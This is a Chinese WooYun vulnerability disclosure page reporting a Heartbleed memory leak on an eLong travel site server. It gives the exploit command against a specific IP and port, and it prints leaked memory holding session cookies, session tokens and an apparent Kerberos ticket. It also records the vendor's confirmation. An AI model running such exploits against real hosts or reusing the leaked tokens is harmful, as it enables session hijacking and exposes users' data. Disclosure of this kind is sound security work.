当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091542

漏洞标题:艺龙旅行网某服务器存在心脏滴血漏洞

相关厂商:艺龙旅行网

漏洞作者: 路人甲

提交时间:2015-01-12 23:52

修复时间:2015-02-26 23:54

公开时间:2015-02-26 23:54

漏洞类型:重要敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-12: 细节已通知厂商并且等待厂商处理中
2015-01-15: 厂商已经确认,细节仅向厂商公开
2015-01-25: 细节向核心白帽子及相关领域专家公开
2015-02-04: 细节向普通白帽子公开
2015-02-14: 细节向实习白帽子公开
2015-02-26: 细节向公众公开

简要描述:

滴啊滴,一堆Cookie

详细说明:

艺龙无线

m.elong.com1.jpg


python openssl.py 211.151.235.154:443

漏洞证明:

#.......ing: gzip, deflate, sdch..Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4..Cookie: NSC_uftu.zjmpoh.dpn_443=ffffffffaf1d0d5245525d5f4f58455e445a4a42378b; TLTSID=D5E6C636430DB5F92F8B2FBE86A342BF; TLTCNT=CAE-MHTML5-40000000000000004; TLTHID=A915CC7F4E1FF79C82DB2698961EF359..... ....).z`U......?+..........t..;k...G2.Eo.n.....H....w..?a.....Z.2FBE86A342BF; TLTHID=5A7AA47A41096AEA9D7B19A0E3C955A0; TLTCNT=CAE-MHTML5-40000000000000004.....Q....Y..1..\"...`..............*@7.h.....l.V.._b1.7.$..<.%V......^AABAAAAAQAAAAlFTE9ORy5DT00AAAAJeWFsaS56aGFvAAAAAgAAAAIAAAAJRUxPTkcuQ09NAAAABmtyYnRndAAAAAlFTE9ORy5DT00AEgAAACDA07sena3jxQbDvxNBigjyBOjFNjkMNzhLz5UVTC3RTVSzoCpUs6AqVLQsylS08aoAAMEAAAAAAAAAAAAAAAABVGGCAVAwggFMoAMCAQWhCxsJRUxPTkcuQ09Noh4wHKADAgECoRUwExsGa3JidGd0GwlFTE9ORy5DT02jggEWMIIBEqADAgESoQMCAQGiggEEBIIBAEvhSBOzmQlDBGy6KtYRcNl%2BBTj0ImYcbXPmh9coKWHLRCfUwiMw2Tohb3x6SRH0P5G7prmtcSoTfco78Xtq6oNQgoddu7NbL%2B9oaG7sm5UFOhIENbSKbBC6x1g%2BGPwmsRAXJgOFKPN3SP5RlST02W8Ss2wpJ8buid1M0GQbr5DBxv%2BOz0wpOb5kPRh0VGaVw3HsL7IW3y%2BLydY95jIKkDCFZWrKLeCfPFuhMRPEWJ2484g%2FSSF9bSBo34S58FaMmTi6Z86Bo0SSkUf2XpbqCWPiP2SNzPzOMlQ5pWEzcZp7iKsUQMNQnRpIH4GAK3BN29uqyBtkaQWlfKwFWh1Lo7AAAAAA; TLTCNT=CAE-MHTML5-40000000000000012; H5SessionId=0f34f48c-6ad1-49b7-82e8-30107abbdbb6; Hm_lvt_68f93b8ecf70d9e560663ca99359d762=1421057912,1421057942,1421057957,1421058729; Hm_lpvt_68f93b8ecf70d9e560663ca99359d762=1421058729; SessionToken=ac978ece-8577-4971-bfcb-8f6a26db4f15622; Hm_lvt_05cce32de5e4df0ddcbabc963c03e3a5=1421058736; Hm_lpvt_05cce32de5e4df0ddcbabc963c03e3a5=1421058740; TLTHID=4D192D054908380B4081CDB1F2C19661....n..34.j.`{J.!...K....................b.....3.wL!.T...$.5P..............i...........................................................................................

修复方案:

补丁

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-15 14:54

厂商回复:

谢谢白帽子给我们提交漏洞,问题已经确认,我们马上修复。

最新状态:

暂无


漏洞评价:

评论